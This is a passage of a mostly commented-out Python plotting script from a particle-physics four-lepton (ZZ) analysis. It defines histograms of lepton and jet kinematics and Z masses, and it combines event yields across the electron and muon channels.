# texX = 'p_{T}(l_{1,extra}) (GeV)', texY = 'Number of Events / 10 GeV',
# attribute = lambda event, sample:event.lep_pt[event.nonZ1_l1_index_4l],
# binning=[30,0,300],
# ))
#
# plots.append(Plot(
# name = "lnonZ1_eta",
# texX = 'eta(l_{1,extra})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_eta[event.nonZ1_l1_index_4l],
# binning=[40,-4.,4.],
# ))
#
# plots.append(Plot(
# name = "lnonZ1_phi",
# texX = '#phi(l_{1,extra})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_phi[event.nonZ1_l1_index_4l],
# binning=[40,-3.2,3.2],
# ))
#
# plots.append(Plot(
# name = "lnonZ1_pdgId",
# texX = 'PDG ID (l_{1,extra})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_pdgId[event.nonZ1_l1_index_4l],
# binning=[30,-15,15],
# ))
#
# # other plots
#
#
# plots.append(Plot(
# texX = 'M(ll) (GeV)', texY = 'Number of Events / 2 GeV',
# attribute = TreeVariable.fromString( "Z1_mass_4l/F" ),
# binning=[20,70,110],
# ))
#
# plots.append(Plot(
# texX = 'M(ll) 2nd OS pair (GeV)', texY = 'Number of Events / 8 GeV',
# attribute = TreeVariable.fromString( "Z2_mass_4l/F" ),
# binning=[20,40,200],
# ))
#
# plots.append(Plot(
# texX = 'M(ZZ) (GeV)', texY = 'Number of Events / 10 GeV',
# attribute = TreeVariable.fromString( "Higgs_mass/F" ),
# binning=[22,80,300],
# ))
#
# plots.append(Plot(
# texX = 'M_{T2}(ll) Z estimated (GeV)', texY = 'Number of Events',
# name = "mt2ll_Z_estimated",
# attribute = lambda event, sample: event.dl_mt2ll_Z,
# binning=[4,0,320],
# ))
#
# plots.append(Plot(
# texX = 'N_{jets}', texY = 'Number of Events',
# attribute = TreeVariable.fromString( "nJetSelected/I" ), #nJetSelected
# binning=[8,-0.5,7.5],
# ))
#
# plots.append(Plot(
# texX = 'N_{b-tag}', texY = 'Number of Events',
# attribute = TreeVariable.fromString( "nBTag/I" ),
# binning=[4,-0.5,3.5],
# ))
#
# plots.append(Plot(
# texX = 'N_{l, loose}', texY = 'Number of Events',
# name = 'nLepLoose', attribute = lambda event, sample: event.nlep,
# binning=[5,2.5,7.5],
# ))
#
# plots.append(Plot(
# texX = 'p_{T}(leading l) (GeV)', texY = 'Number of Events / 20 GeV',
# name = 'lep1_pt', attribute = lambda event, sample: event.lep_pt[0],
# binning=[400/20,0,400],
# ))
#
# plots.append(Plot(
# texX = 'p_{T}(subleading l) (GeV)', texY = 'Number of Events / 10 GeV',
# name = 'lep2_pt', attribute = lambda event, sample: event.lep_pt[1],
# binning=[200/10,0,200],
# ))
#
# plots.append(Plot(
# texX = 'p_{T}(trailing l) (GeV)', texY = 'Number of Events / 10 GeV',
# name = 'lep3_pt', attribute = lambda event, sample: event.lep_pt[2],
# binning=[150/10,0,150],
# ))
#
# plots.append(Plot(
# texX = 'p_{T}(leading jet) (GeV)', texY = 'Number of Events / 30 GeV',
# name = 'jet1_pt', attribute = lambda event, sample: event.jet_pt[0],
# binning=[600/30,0,600],
# ))
#
# plots.append(Plot(
# texX = 'p_{T}(2nd leading jet) (GeV)', texY = 'Number of Events / 30 GeV',
# name = 'jet2_pt', attribute = lambda event, sample: event.jet_pt[1],
# binning=[600/30,0,600],
# ))
#
# plots.append(Plot(
# name = "LP", texX = 'L_{P}', texY = 'Number of Events / 0.1',
# attribute = lambda event, sample:event.Lp,
# binning=[20,-1,1],
# ))
#
# plots.append(Plot(
# name = "Z1_cosThetaStar", texX = 'cos#theta(Z1,l-)', texY = 'Number of Events / 0.2',
# attribute = lambda event, sample:event.Z1_cosThetaStar_4l,
# binning=[10,-1,1],
# ))
#
# plots.append(Plot(
# name = "Z1_cosThetaStar_coarse", texX = 'cos#theta(Z1,l-)', texY = 'Number of Events / 0.2',
# attribute = lambda event, sample:event.Z1_cosThetaStar_4l,
# binning=[5,-1,1],
# ))
#
# plots.append(Plot(
# name = "Z2_cosThetaStar", texX = 'cos#theta(Z2,l-)', texY = 'Number of Events / 0.2',
# attribute = lambda event, sample:event.Z2_cosThetaStar_4l,
# binning=[10,-1,1],
# ))
#
# plotting.fill(plots, read_variables = read_variables, sequence = sequence)
#
# # Get normalization yields from yield histogram
# for plot in plots:
# if plot.name == "yield":
# for i, l in enumerate(plot.histos):
# for j, h in enumerate(l):
# yields[mode][plot.stack[i][j].name] = h.GetBinContent(h.FindBin(0.5+index))
# h.GetXaxis().SetBinLabel(1, "#mu#mu#mu#mu")
# h.GetXaxis().SetBinLabel(2, "#mu#mu#mue")
# h.GetXaxis().SetBinLabel(3, "#mu#muee")
# h.GetXaxis().SetBinLabel(4, "#mueee")
# h.GetXaxis().SetBinLabel(5, "eeee")
# if args.noData: yields[mode]["data"] = 0
#
# yields[mode]["MC"] = sum(yields[mode][s.name] for s in mc)
# dataMCScale = yields[mode]["data"]/yields[mode]["MC"] if yields[mode]["MC"] != 0 else float('nan')
#
# drawPlots(plots, mode, dataMCScale)
# allPlots[mode] = plots
#
## Add the different channels into SF and all
#for mode in ["comb1","comb2","comb3","all"]:
# yields[mode] = {}
# for y in yields[allModes[0]]:
# try: yields[mode][y] = sum(yields[c][y] for c in ['eeee','mueee','mumuee', 'mumumue', 'mumumumu'])
# except: yields[mode][y] = 0
# dataMCScale = yields[mode]["data"]/yields[mode]["MC"] if yields[mode]["MC"] != 0 else float('nan')
#
# for plot in allPlots['mumumumu']:
# if mode=="comb1":
# tmp = allPlots['mumumue']
# elif mode=="comb2":
# tmp = allPlots['mumuee']
# elif mode=="comb3":
# tmp = allPlots['mueee']
# else:
# tmp = allPlots['eeee']
# for plot2 in (p for p in tmp if p.name == plot.name):
# for i, j in enumerate(list(itertools.chain.from_iterable(plot.histos))):
# for k, l in enumerate(list(itertools.chain.from_iterable(plot2.histos))):
# if i==k:
# j.Add(l)
#
# if mode == "all": drawPlots(allPlots['mumumumu'], mode, dataMCScale)
#
#logger.info( "Done with prefix %s and selectionString %s", args.selection, cutInterpreter.cutString(args.selection) )
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.